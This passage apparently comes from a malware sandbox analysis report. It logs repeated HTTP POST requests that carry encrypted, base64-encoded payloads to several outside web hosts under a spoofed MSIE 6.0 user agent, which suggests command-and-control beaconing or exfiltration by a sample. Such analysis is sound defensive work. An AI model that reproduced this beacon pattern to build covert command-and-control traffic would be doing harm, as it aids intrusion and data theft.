6a 67 45 74 61 74 76 4e 45 39 59 6f 50 59 79 48 71 59 43 55 36 56 56 65 58 34 36 75 45 62 39 4c 53 4d 45 63 6c 74 67 47 36 70 66 67 41 2b 65 37 4b 4e 38 44 33 4a 74 73 46 56 52 66 49 73 59 77 44 43 52 63 53 56 6d 41 34 4b 72 2b 4c 2f 55 6e 75 73 68 35 70 73 47 7a 6a 6d 2b 32 53 52 67 39 73 76 39 31 6b 6a 63 33 47 4c 45 49 64 51 36 38 73 46 48 44 71 4c 66 6a 38 4e 6b 67 57 66 38 73 48 6a 55 61 65 34 30 6d 32 62 6c 38 4c 54 65 32 77 54 61 5a 58 51 72 74 6c 52 6d 66 59 77 61 56 58 72 69 4f 51 6a 79 41 71 68 50 37 37 4f 48 31 32 67 4c 5a 2f 67 2b 4d 2f 56 2b 4d 38 66 31 59 75 36 78 61 48 31 64 67 37 4b 35 75 32 64 53 71 79 49 5a 35 6d 38 52 51 6d 43 45 49 64 57 37 56 2f 45 4b 76 6d 56 31 69 45 78 6a 72 33 37 30 59 5a 46 79 50 43 78 4f 68 62 4a 6a 38 47 30 67 59 4c 52 34 6c 47 53 4b 63 67 68 4d 6a 43 4e 43 6e 44 6d 78 77 55 43 79 66 4a 65 4d 66 76 72 4e 46 68 Data Ascii: LS7DQpbRBWMb92HZcVviDDlvSRA2pyX8KsdJV9x5Mfw7ZiUrP0Bz+xfRaaozqTUTw0bpUutBeeIwCA3nlVgztl/Fnx0leAkGLnO4fWUXoVl2iEWesJMD0AC3jXxSKtT8tZDl9yefXN1Jq4rRvrpiClm081XevgnRdDY6inwGlMuplin8zsoxI/jKZjNCUZMOiB7Br4G70g1IKJerirh2lxuA+gHye7iX4cgp5rWq7lyTE9289/ORCK6mMRk+SFZEkBKgF6CGzIp2n7pSl9SJzkJ+zV+iy1yVqvdIz5ykdpN3CnMjgEtatvNE9YoPYyHqYCU6VVeX46uEb9LSMEcltgG6pfgA+e7KN8D3JtsFVRfIsYwDCRcSVmA4Kr+L/Unush5psGzjm+2SRg9sv91kjc3GLEIdQ68sFHDqLfj8NkgWf8sHjUae40m2bl8LTe2wTaZXQrtlRmfYwaVXriOQjyAqhP77OH12gLZ/g+M/V+M8f1Yu6xaH1dg7K5u2dSqyIZ5m8RQmCEIdW7V/EKvmV1iExjr370YZFyPCxOhbJj8G0gYLR4lGSKcghMjCNCnDmxwUCyfJeMfvrNFh
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.credo.edu.plCache-Control: no-cacheData Raw: 43 67 5a 7a 52 34 37 34 42 57 50 6a 39 79 63 6f 47 53 61 6a 36 76 46 45 70 4f 79 4f 52 58 71 69 6f 70 6e 42 6e 52 7a 2f 46 7a 62 52 2b 6a 53 49 37 57 43 68 4c 51 4a 2f 62 52 4a 70 44 55 66 6c 31 56 65 4a 4f 44 4c 73 49 70 42 68 59 55 4a 56 39 30 44 5a 4f 73 4f 6e 59 65 64 64 53 78 31 37 2f 72 37 7a 78 39 2b 71 6c 57 51 7a 6f 4b 70 54 61 7a 62 36 64 68 59 4e 59 41 71 30 36 6a 38 52 50 56 42 66 4b 69 6a 48 72 6a 72 35 37 41 4b 6e 69 4e 30 70 51 48 71 66 45 42 6c 4d 56 50 4b 6f 45 5a 36 6a 6a 42 38 67 52 2b 54 67 6b 73 4c 2b 6e 68 39 72 4d 79 33 73 77 57 69 78 33 2f 50 6b 46 59 73 49 37 63 75 38 52 2b 47 78 5a 49 74 73 4e 63 41 49 66 6b 79 4d 73 52 71 4b 2f 57 77 6e 41 6d 66 78 66 72 64 59 56 61 53 41 55 36 31 77 36 36 62 43 4d 36 47 73 50 31 6b 47 41 56 4d 70 6a 50 68 41 6a 36 34 72 72 72 43 73 6a 6b 54 55 72 2b 6e 58 71 75 69 65 57 78 65 4c 42 72 70 39 34 37 54 5a 4f 6a 41 67 46 42 49 50 31 55 47 59 63 50 47 64 33 38 49 49 70 4c 54 62 35 34 6a 2b 62 5a 33 6c 2b 48 45 69 78 35 64 62 4d 49 64 39 70 68 68 32 46 78 36 53 61 2f 38 64 64 43 51 78 33 73 61 55 59 45 4a 50 7a 62 75 71 6f 72 59 70 61 73 50 63 34 57 67 62 62 4c 2b 5a 62 53 42 66 47 71 4f 75 2b 73 6f 53 67 72 79 30 79 32 38 54 6b 74 73 53 52 77 51 4e 56 44 74 7a 41 37 56 56 79 4c 56 6a 6e 37 62 30 7a 45 35 77 56 6b 6d 44 6a 59 39 4d 50 63 52 72 58 58 68 7a 6b 77 74 71 62 32 4b 6e 74 6a 6c 2b 55 79 78 74 62 4f 4a 6c 56 55 2f 75 65 75 78 70 59 4a 65 63 51 49 4c 47 4d 42 44 76 52 43 72 48 32 6f 65 4b 52 41 32 6d 4a 58 78 57 45 4d 75 52 39 51 74 41 4b 4f 4f 50 62 59 30 63 32 66 52 42 63 76 6a 43 4a 39 4b 76 37 5a 4e 65 56 56 53 6b 4d 36 77 3d Data Ascii: CgZzR474BWPj9ycoGSaj6vFEpOyORXqiopnBnRz/FzbR+jSI7WChLQJ/bRJpDUfl1VeJODLsIpBhYUJV90DZOsOnYeddSx17/r7zx9+qlWQzoKpTazb6dhYNYAq06j8RPVBfKijHrjr57AKniN0pQHqfEBlMVPKoEZ6jjB8gR+TgksL+nh9rMy3swWix3/PkFYsI7cu8R+GxZItsNcAIfkyMsRqK/WwnAmfxfrdYVaSAU61w66bCM6GsP1kGAVMpjPhAj64rrrCsjkTUr+nXquieWxeLBrp947TZOjAgFBIP1UGYcPGd38IIpLTb54j+bZ3l+HEix5dbMId9phh2Fx6Sa/8ddCQx3saUYEJPzbuqorYpasPc4WgbbL+ZbSBfGqOu+soSgry0y28TktsSRwQNVDtzA7VVyLVjn7b0zE5wVkmDjY9MPcRrXXhzkwtqb2Kntjl+UyxtbOJlVU/ueuxpYJecQILGMBDvRCrH2oeKRA2mJXxWEMuR9QtAKOOPbY0c2fRBcvjCJ9Kv7ZNeVVSkM6w=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.credo.edu.plCache-Control: no-cacheData Raw: 43 67 5a 7a 52 34 37 34 42 57 50 6a 39 79 63 6f 47 53 61 6a 36 76 46 45 70 4f 79 4f 52 58 71 69 6f 70 6e 42 6e 52 7a 2f 46 7a 62 52 2b 6a 53 49 37 57 43 68 4c 51 4a 2f 62 52 4a 70 44 55 66 6c 31 56 65 4a 4f 44 4c 73 49 70 42 68 59 55 4a 56 39 30 44 5a 4f 73 4f 6e 59 65 64 64 53 78 31 37 2f 72 37 7a 78 39 2b 71 6c 57 51 7a 6f 4b 70 54 61 7a 62 36 64 68 59 4e 59 41 71 30 36 6a 38 52 50 56 42 66 4b 69 6a 48 72 6a 72 35 37 41 4b 6e 69 4e 30 70 51 48 71 66 45 42 6c 4d 56 50 4b 6f 45 5a 36 6a 6a 42 38 67 52 2b 54 67 6b 73 4c 2b 6e 68 39 72 4d 79 33 73 77 57 69 78 33 2f 50 6b 46 59 73 49 37 63 75 38 52 2b 47 78 5a 49 74 73 4e 63 41 49 66 6b 79 4d 73 52 71 4b 2f 57 77 6e 41 6d 66 78 66 72 64 59 56 61 53 41 55 36 31 77 36 36 62 43 4d 36 47 73 50 31 6b 47 41 56 4d 70 6a 50 68 41 6a 36 34 72 72 72 43 73 6a 6b 54 55 72 2b 6e 58 71 75 69 65 57 78 65 4c 42 72 70 39 34 37 54 5a 4f 6a 41 67 46 42 49 50 31 55 47 59 63 50 47 64 33 38 49 49 70 4c 54 62 35 34 6a 2b 62 5a 33 6c 2b 48 45 69 78 35 64 62 4d 49 64 39 70 68 68 32 46 78 36 53 61 2f 38 64 64 43 51 78 33 73 61 55 59 45 4a 50 7a 62 75 71 6f 72 59 70 61 73 50 63 34 57 67 62 62 4c 2b 5a 62 53 42 66 47 71 4f 75 2b 73 6f 53 67 72 79 30 79 32 38 54 6b 74 73 53 52 77 51 4e 56 44 74 7a 41 37 56 56 79 4c 56 6a 6e 37 62 30 7a 45 35 77 56 6b 6d 44 6a 59 39 4d 50 63 52 72 58 58 68 7a 6b 77 74 71 62 32 4b 6e 74 6a 6c 2b 55 79 78 74 62 4f 4a 6c 56 55 2f 75 65 75 78 70 59 4a 65 63 51 49 4c 47 4d 42 44 76 52 43 72 48 32 6f 65 4b 52 41 32 6d 4a 58 78 57 45 4d 75 52 39 51 74 41 4b 4f 4f 50 62 59 30 63 32 66 52 42 63 76 6a 43 4a 39 4b 76 37 5a 4e 65 56 56 53 6b 4d 36 77 3d Data Ascii: CgZzR474BWPj9ycoGSaj6vFEpOyORXqiopnBnRz/FzbR+jSI7WChLQJ/bRJpDUfl1VeJODLsIpBhYUJV90DZOsOnYeddSx17/r7zx9+qlWQzoKpTazb6dhYNYAq06j8RPVBfKijHrjr57AKniN0pQHqfEBlMVPKoEZ6jjB8gR+TgksL+nh9rMy3swWix3/PkFYsI7cu8R+GxZItsNcAIfkyMsRqK/WwnAmfxfrdYVaSAU61w66bCM6GsP1kGAVMpjPhAj64rrrCsjkTUr+nXquieWxeLBrp947TZOjAgFBIP1UGYcPGd38IIpLTb54j+bZ3l+HEix5dbMId9phh2Fx6Sa/8ddCQx3saUYEJPzbuqorYpasPc4WgbbL+ZbSBfGqOu+soSgry0y28TktsSRwQNVDtzA7VVyLVjn7b0zE5wVkmDjY9MPcRrXXhzkwtqb2Kntjl+UyxtbOJlVU/ueuxpYJecQILGMBDvRCrH2oeKRA2mJXxWEMuR9QtAKOOPbY0c2fRBcvjCJ9Kv7ZNeVVSkM6w=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mqs.com.brCache-Control: no-cacheCookie: _mcnc=1; __goc_session__=cftnkefqbeovadfhcumfjapsdjszgtwkData Raw: 4a 55 6f 39 52 6e 2f 75 42 57 4f 31 79 4f 65 79 58 71 6b 70 36 77 67 39 75 46 7a 56 31 4d 69 43 49 36 61 52 54 42 52 2b 2b 4f 74 7a 4b 30 65 48 49 7a 2b 35 51 7a 47 72 68 74 37 52 6e 67 50 53 36 62 64 68 4f 37 61 73 31 6b 51 55 5a 33 61 53 69 63 65 70 61 31 76 71 33 56 49 53 54 77 34 4d 6a 6e 52 5a 54 48 69 70 31 58 4b 39 30 49 4c 2b 46 48 55 72 4a 56 64 6e 2f 4b 57 4a 32 35 65 51 42 57 68 4a 38 5a 6a 61 55 64 32 66 47 6c 38 75 44 47 64 52 69 4d 71 61 77 63 47 78 7a 6e 62 37 43 79 6d 31 43 62 2b 4e 6c 37 66 73 4c 48 6e 4a 56 77 61 45 5a 34 79 56 65 6e 78 44 31 33 58 5a 56 67 39 42 4a 63 77 45 79 70 54 4a 6b 2b 6b 61 75 76 52 41 34 33 74 37 66 55 43 48 6f 71 54 33 57 38 61 73 38 4b 37 38 42 37 6a 6a 42 2f 30 45 33 47 75 66 45 61 44 58 7a 65 34 54 5a 4a 47 33 70 72 36 70 59 66 7a 48 71 58 41 63 78 56 78 4b 50 65 62 67 4a 55 61 36 67 52 47 48 5a 51 4c 64 59 30 34 43 6f 35 32 73 6e 45 39 52 30 51 6e 64 63 37 75 39 5a 57 68 34 62 74 54 7a 6c 52 76 33 4d 54 4d 4c 47 39 73 5a 62 79 58 75 4a 4f 79 70 5a 4b 51 4f 72 63 53 72 49 6a 72 74 42 58 47 38 65 4f 37 61 55 46 64 50 45 6d 67 72 61 45 4a 78 35 36 56 63 77 48 31 6f 32 6a 55 76 39 67 2b 38 69 68 49 4e 53 73 71 66 76 6b 53 56 2f 38 6f 2f 6b 56 46 45 4f 34 64 66 44 46 72 6b 59 45 30 6a 42 31 4f 51 49 70 71 6c 65 68 59 61 6d 31 57 64 30 4a 65 4e 65 4a 59 55 6f 69 44 51 71 58 55 7a 6b 51 6f 7a 49 44 38 34 4e 68 79 6e 61 44 4a 38 6f 6d 79 56 46 6b 6f 53 6d 4d 2b 76 2f 50 39 38 32 77 52 39 6b 61 53 55 34 53 69 71 68 41 59 78 34 68 65 55 66 4a 44 66 70 66 72 66 79 30 55 69 6a 6e 58 72 6b 31 6c 50 71 38 32 34 70 32 46 4d 58 6f 7a 35 64 7a 31 59 66 4a 42 65 Data Ascii: JUo9Rn/uBWO1yOeyXqkp6wg9uFzV1MiCI6aRTBR++OtzK0eHIz+5QzGrht7RngPS6bdhO7as1kQUZ3aSicepa1vq3VISTw4MjnRZTHip1XK90IL+FHUrJVdn/KWJ25eQBWhJ8ZjaUd2fGl8uDGdRiMqawcGxznb7Cym1Cb+Nl7fsLHnJVwaEZ4yVenxD13XZVg9BJcwEypTJk+kauvRA43t7fUCHoqT3W8as8K78B7jjB/0E3GufEaDXze4TZJG3pr6pYfzHqXAcxVxKPebgJUa6gRGHZQLdY04Co52snE9R0Qndc7u9ZWh4btTzlRv3MTMLG9sZbyXuJOypZKQOrcSrIjrtBXG8eO7aUFdPEmgraEJx56VcwH1o2jUv9g+8ihINSsqfvkSV/8o/kVFEO4dfDFrkYE0jB1OQIpqlehYam1Wd0JeNeJYUoiDQqXUzkQozID84NhynaDJ8omyVFkoSmM+v/P982wR9kaSU4SiqhAYx4heUfJDfpfrfy0UijnXrk1lPq824p2FMXoz5dz1YfJBe
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.yocinc.orgCache-Control: no-cacheData Raw: 33 63 46 33 77 41 54 31 67 70 73 74 48 6e 59 45 48 2f 77 59 50 64 64 61 73 66 55 38 30 72 73 4d 65 42 49 67 33 70 6a 43 39 43 5a 69 6e 6d 6b 33 49 37 51 43 68 54 64 38 52 56 41 6d 4b 70 65 51 49 48 55 72 54 77 43 49 6e 54 52 51 68 6a 76 41 38 55 73 47 69 4b 36 46 33 62 53 2b 44 4e 31 73 47 50 33 45 34 4e 41 42 61 43 74 31 54 38 65 38 43 36 31 59 79 58 47 55 48 6f 6c 54 69 4e 44 4e 78 72 75 44 63 67 79 6e 54 58 74 71 34 48 34 61 69 44 38 51 76 4a 69 7a 4f 50 56 73 37 77 56 35 78 47 72 38 6c 6f 62 4d 68 55 55 52 57 37 2f 4e 36 42 34 4b 43 4b 37 73 5a 58 35 2b 47 63 4d 37 73 2f 38 73 64 45 64 44 31 6f 6a 4e 41 43 49 76 64 63 73 33 43 64 34 61 41 39 61 78 59 47 79 6e 7a 4f 4c 36 32 38 64 61 56 6c 51 77 77 68 79 35 6b 4e 45 6b 65 63 70 65 6d 6c 4d 33 4d 68 59 36 58 58 4d 70 67 31 41 69 4c 6e 33 50 6a 59 46 6c 58 52 54 52 75 53 32 75 79 76 41 72 39 6a 30 70 6b 4d 53 2b 58 33 41 55 58 58 77 70 33 48 48 69 2f 42 63 6d 4f 45 2b 75 56 78 48 53 67 75 49 39 48 74 30 52 77 59 36 72 34 70 7a 41 38 2b 4e 6f 2b 4e 79 66 67 49 64 46 58 44 77 4a 6a 77 58 70 5a 74 32 38 43 77 4f 54 50 32 38 36 34 35 38 63 62 47 67 46 7a 71 50 61 69 54 79 56 72 44 56 31 6d 7a 4d 64 50 46 6f 56 62 6a 69 49 37 41 73 70 34 4a 76 59 4d 41 67 45 52 4d 33 65 45 67 35 32 67 76 72 6c 45 79 76 68 59 66 30 68 6c 41 6a 41 58 70 67 51 34 30 64 43 46 74 72 49 48 36 34 42 73 38 30 4a 52 33 36 76 61 30 55 6d 34 4a 53 6d 30 47 38 68 38 5a 67 39 58 53 7a 65 6e 77 77 58 63 49 77 52 55 48 59 69 77 45 77 38 73 6f 31 50 4c 46 4d 44 65 33 66 35 33 4a 49 4e 56 54 53 74 73 4e 64 6d 68 4d 64 6a 70 36 49 6d 44 55 39 79 62 51 3d 3d Data Ascii: 3cF3wAT1gpstHnYEH/wYPddasfU80rsMeBIg3pjC9CZinmk3I7QChTd8RVAmKpeQIHUrTwCInTRQhjvA8UsGiK6F3bS+DN1sGP3E4NABaCt1T8e8C61YyXGUHolTiNDNxruDcgynTXtq4H4aiD8QvJizOPVs7wV5xGr8lobMhUURW7/N6B4KCK7sZX5+GcM7s/8sdEdD1ojNACIvdcs3Cd4aA9axYGynzOL628daVlQwwhy5kNEkecpemlM3MhY6XXMpg1AiLn3PjYFlXRTRuS2uyvAr9j0pkMS+X3AUXXwp3HHi/BcmOE+uVxHSguI9Ht0RwY6r4pzA8+No+NyfgIdFXDwJjwXpZt28CwOTP286458cbGgFzqPaiTyVrDV1mzMdPFoVbjiI7Asp4JvYMAgERM3eEg52gvrlEyvhYf0hlAjAXpgQ40dCFtrIH64Bs80JR36va0Um4JSm0G8h8Zg9XSzenwwXcIwRUHYiwEw8so1PLFMDe3f53JINVTStsNdmhMdjp6ImDU9ybQ==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.elpro.siCache-Control: no-cacheData Raw: 35 44 73 32 4b 46 71 56 46 57 4f 73 78 74 72 76 66 57 54 54 63 35 30 62 37 44 4e 4b 41 4e 78 78 4c 6f 57 42 42 62 69 70 4b 31 68 67 45 44 4c 50 76 70 57 32 2b 6c 4b 39 44 46 6d 69 4d 68 52 66 31 62 41 79 4e 69 5a 34 68 30 42 34 67 64 48 30 6b 39 6f 61 32 43 33 6f 45 30 30 66 39 61 6b 4c 78 54 38 4c 38 74 32 36 34 56 31 71 35 79 30 63 44 6a 58 70 48 78 43 31 4e 36 79 44 67 62 6b 32 4b 44 72 71 57 30 37 4d 31 4b 45 56 74 73 44 30 34 69 58 77 49 66 69 64 6e 4f 52 55 30 37 33 6a 78 73 51 38 78 76 53 31 6f 45 73 61 2f 79 55 33 63 70 41 6a 67 42 32 65 54 50 62 74 67 5a 58 70 4e 33 33 62 65 47 34 2f 43 4d 54 76 4b 63 78 67 6a 57 56 33 75 68 4f 35 4a 47 6f 75 68 67 57 79 45 4c 31 76 76 43 7a 2f 37 73 78 75 72 4b 72 4c 71 50 4b 4a 7a 46 68 57 79 38 42 58 56 61 58 43 4e 56 4a 4c 32 46 64 4c 6b 37 62 4f 4b 73 67 71 75 4e 6d 63 6b 76 62 76 38 61 55 65 4e 76 35 66 4e 68 4c 49 56 4a 78 68 37 67 55 32 64 36 64 73 58 67 47 4c 39 49 31 56 62 65 47 66 76 53 43 48 2b 75 64 2b 63 4b 6c 45 5a 6e 55 37 72 31 74 70 4d 76 66 4d 45 64 68 51 61 57 65 4b 43 2b 4f 4b 5a 35 4d 73 73 66 72 71 59 43 71 6c 56 46 32 39 31 69 61 34 68 50 46 48 33 6d 75 78 79 4c 35 38 46 47 59 4e 7a 56 41 6a 35 67 47 45 76 66 70 37 35 66 49 47 66 55 34 30 34 33 76 50 36 46 52 5a 35 49 79 30 4f 7a 50 6f 74 52 53 49 4e 62 2f 4c 69 30 70 35 6d 68 76 49 4e 39 2b 51 79 61 61 39 48 6d 30 2b 47 53 67 33 65 78 45 42 48 6c 64 52 45 56 65 66 56 6d 4f 6a 69 65 51 77 79 53 6a 34 4f 71 63 41 68 6f 62 79 68 62 6d 51 69 62 57 49 68 77 70 51 48 76 35 44 43 41 67 5a 4a 32 59 77 61 5a 36 58 32 44 33 67 64 71 33 55 33 45 74 49 76 46 4c 4a 5a 78 77 57 70 65 57 73 4b 50 4f 48 54 55 56 65 55 58 2f 54 70 78 77 37 4f 79 32 6e 31 68 59 79 65 41 32 33 4b 7a 6b 77 43 4b 46 6f Data Ascii: 5Ds2KFqVFWOsxtrvfWTTc50b7DNKANxxLoWBBbipK1hgEDLPvpW2+lK9DFmiMhRf1bAyNiZ4h0B4gdH0k9oa2C3oE00f9akLxT8L8t264V1q5y0cDjXpHxC1N6yDgbk2KDrqW07M1KEVtsD04iXwIfidnORU073jxsQ8xvS1oEsa/yU3cpAjgB2eTPbtgZXpN33beG4/CMTvKcxgjWV3uhO5JGouhgWyEL1vvCz/7sxurKrLqPKJzFhWy8BXVaXCNVJL2FdLk7bOKsgquNmckvbv8aUeNv5fNhLIVJxh7gU2d6dsXgGL9I1VbeGfvSCH+ud+cKlEZnU7r1tpMvfMEdhQaWeKC+OKZ5MssfrqYCqlVF291ia4hPFH3muxyL58FGYNzVAj5gGEvfp75fIGfU4043vP6FRZ5Iy0OzPotRSINb/Li0p5mhvIN9+Qyaa9Hm0+GSg3exEBHldREVefVmOjieQwySj4OqcAhobyhbmQibWIhwpQHv5DCAgZJ2YwaZ6X2D3gdq3U3EtIvFLJZxwWpeWsKPOHTUVeUX/Tpxw7Oy2n1hYyeA23KzkwCKFo
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.depalo.comCache-Control: no-cacheData Raw: 63 64 74 69 63 46 6e 74 46 32 4e 74 4e 4a 71 52 61 48 62 6f 2b 76 4c 57 33 7a 57 33 2f 57 44 7a 6e 62 58 44 73 69 43 67 67 53 6e 50 53 75 50 65 38 6d 73 78 2b 47 42 7a 57 34 6e 30 34 6d 66 48 65 76 77 57 38 6d 34 67 2b 4d 56 74 64 33 6b 58 67 77 2b 4f 49 72 33 57 62 51 62 47 34 69 65 2b 71 4f 53 37 55 50 2f 41 55 6d 55 4b 61 72 6c 76 4c 4b 53 76 54 6c 6a 4a 79 55 72 36 72 54 47 44 33 70 51 43 44 2b 44 38 45 43 5a 78 37 6f 41 38 45 34 62 64 32 41 51 45 6c 45 4e 4b 73 2f 38 51 61 2f 71 5a 63 79 2b 6d 70 72 75 72 4e 35 68 30 42 68 63 73 35 55 4b 65 64 63 32 4c 59 42 4e 6b 64 32 47 72 36 45 57 35 41 73 2f 2b 7a 33 71 45 73 4a 65 56 78 62 6b 6c 4c 77 71 39 31 6b 6e 47 46 4a 74 4e 79 49 49 64 44 35 45 36 52 67 7a 77 47 4b 50 48 34 49 57 74 34 50 4b 7a 36 2b 34 52 73 53 74 48 75 47 34 4d 4a 53 38 4b 4c 63 39 7a 30 70 79 74 72 51 6d 32 45 78 74 4e 65 7a 33 6a 77 59 46 4e 58 75 55 52 65 71 73 78 67 35 55 66 61 6c 48 52 45 50 4a 65 4f 75 7a 4c 59 5a 4b 30 6e 36 72 78 6f 52 7a 72 6a 34 56 44 50 58 70 4c 33 51 4b 50 77 72 4a 33 5a 33 44 4b 70 76 78 5a 50 58 55 51 49 33 37 5a 39 44 35 2b 37 2b 4c 41 34 61 6e 66 68 30 47 52 6b 69 61 50 36 59 70 34 43 4f 69 52 6a 4b 39 62 58 58 70 2f 4a 61 64 63 52 6b 7a 59 42 5a 6a 71 46 6a 52 2f 7a 38 35 6b 78 6e 46 5a 63 49 46 4f 55 34 47 30 7a 4e 41 7a 68 35 70 69 56 79 32 2f 49 77 61 37 34 6f 63 73 37 6e 73 39 5a 4b 6d 57 58 67 64 73 48 51 2b 73 51 74 46 56 69 4e 67 4d 67 39 47 34 30 33 52 71 36 79 35 55 61 6c 4d 54 4d 59 75 59 52 67 71 2b 64 49 4e 2f 30 57 36 49 50 62 66 55 38 50 4a 65 6c 49 58 5a 38 6f 7a 62 6c 31 76 67 6e 55 49 4e 2f 45 30 4f 59 37 62 37 32 2b 4f 38 5a 6f 30 50 44 4e 4f 43 61 46 69 6c 32 45 59 45 50 49 42 72 32 72 71 31 71 42 50 4d 4e 68 68 77 6b 58 63 55 67 49 49 64 39 71 6b 44 33 51 3d 3d Data Ascii: cdticFntF2NtNJqRaHbo+vLW3zW3/WDznbXDsiCggSnPSuPe8msx+GBzW4n04mfHevwW8m4g+MVtd3kXgw+OIr3WbQbG4ie+qOS7UP/AUmUKarlvLKSvTljJyUr6rTGD3pQCD+D8ECZx7oA8E4bd2AQElENKs/8Qa/qZcy+mprurN5h0Bhcs5UKedc2LYBNkd2Gr6EW5As/+z3qEsJeVxbklLwq91knGFJtNyIIdD5E6RgzwGKPH4IWt4PKz6+4RsStHuG4MJS8KLc9z0pytrQm2ExtNez3jwYFNXuUReqsxg5UfalHREPJeOuzLYZK0n6rxoRzrj4VDPXpL3QKPwrJ3Z3DKpvxZPXUQI37Z9D5+7+LA4anfh0GRkiaP6Yp4COiRjK9bXXp/JadcRkzYBZjqFjR/z85kxnFZcIFOU4G0zNAzh5piVy2/Iwa74ocs7ns9ZKmWXgdsHQ+sQtFViNgMg9G403Rq6y5UalMTMYuYRgq+dIN/0W6IPbfU8PJelIXZ8ozbl1vgnUIN/E0OY7b72+O8Zo0PDNOCaFil2EYEPIBr2rq1qBPMNhhwkXcUgIId9qkD3Q==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 67 38 49 70 72 4f 73 38 6d 35 75 43 39 78 32 4c 77 71 32 4a 38 46 54 57 46 7a 75 78 38 59 74 33 54 30 58 78 37 34 35 34 68 59 63 5a 63 6e 54 59 67 72 38 71 67 44 44 6f 53 49 73 2f 49 59 57 2f 61 52 34 77 2f 32 47 2f 30 55 50 33 6a 41 5a 70 45 5a 30 35 45 67 67 31 59 48 34 75 70 50 32 38 57 4d 30 52 31 79 62 62 59 56 72 49 45 63 66 6f 37 4d 67 6a 4f 2f 4f 4c 57 42 48 51 37 64 62 45 4f 71 51 4f 74 65 76 4b 53 42 37 4b 43 62 46 77 4d 4d 6a 33 2b 4c 5a 62 2f 32 78 34 51 5a 56 4d 56 76 66 4c 36 43 4f 77 55 41 59 50 52 54 42 7a 30 4a 67 34 36 72 43 4e 42 51 48 43 68 55 63 39 36 70 42 57 70 4a 50 31 59 4f 79 4a 49 5a 44 79 41 4b 6a 41 50 54 62 69 72 55 6a 49 53 45 65 50 4f 6b 52 72 36 54 30 4f 6d 38 57 51 36 47 63 61 4b 6a 68 79 52 6c 6c 55 35 37 39 70 38 71 6b 4c 44 73 51 59 33 59 7a 73 34 35 64 78 4d 6d 44 6c 59 4e 44 49 77 31 4f 74 47 71 61 43 50 61 62 67 70 4a 41 6f 70 74 43 45 57 6d 4a 38 4d 30 71 4e 48 62 45 47 45 41 49 2f 4f 50 79 31 62 75 75 4a 66 41 6f 76 71 57 63 4b 46 4f 61 7a 30 59 35 31 5a 55 32 46 6b 2b 54 63 63 63 41 56 4f 4c 45 4a 69 78 55 57 6d 69 39 59 2b 50 75 67 45 70 4c 51 62 4b 2b 47 4e 78 48 64 71 5a 52 54 71 6f 39 77 79 47 6b 49 37 75 38 6e 66 6b 31 76 57 73 4c 4d 38 76 48 5a 6f 39 65 45 32 37 71 79 48 78 37 35 75 42 4c 7a 6a 2b 6a 6c 7a 48 78 70 48 58 6f 50 39 35 50 6f 6e 59 66 51 39 64 51 58 76 62 48 6e 6e 55 58 68 7a 78 79 73 49 59 43 69 57 74 79 4e 31 57 4d 44 32 78 6c 4e 77 41 2f 67 6d 38 6b 65 39 75 65 6b 55 2f 77 45 54 79 63 6f 31 31 77 74 48 62 56 75 41 78 47 45 4b 46 76 35 38 68 7a 6f 67 34 58 59 2f 64 6a 33 78 6c 78 77 71 34 68 78 41 4b 2f 68 37 66 64 31 75 48 43 6c 78 51 79 4a 51 4a 42 6b 50 56 51 56 43 4e 45 3d Data Ascii: g8IprOs8m5uC9x2Lwq2J8FTWFzux8Yt3T0Xx7454hYcZcnTYgr8qgDDoSIs/IYW/aR4w/2G/0UP3jAZpEZ05Egg1YH4upP28WM0R1ybbYVrIEcfo7MgjO/OLWBHQ7dbEOqQOtevKSB7KCbFwMMj3+LZb/2x4QZVMVvfL6COwUAYPRTBz0Jg46rCNBQHChUc96pBWpJP1YOyJIZDyAKjAPTbirUjISEePOkRr6T0Om8WQ6GcaKjhyRllU579p8qkLDsQY3Yzs45dxMmDlYNDIw1OtGqaCPabgpJAoptCEWmJ8M0qNHbEGEAI/OPy1buuJfAovqWcKFOaz0Y51ZU2Fk+TcccAVOLEJixUWmi9Y+PugEpLQbK+GNxHdqZRTqo9wyGkI7u8nfk1vWsLM8vHZo9eE27qyHx75uBLzj+jlzHxpHXoP95PonYfQ9dQXvbHnnUXhzxysIYCiWtyN1WMD2xlNwA/gm8ke9uekU/wETyco11wtHbVuAxGEKFv58hzog4XY/dj3xlxwq4hxAK/h7fd1uHClxQyJQJBkPVQVCNE=
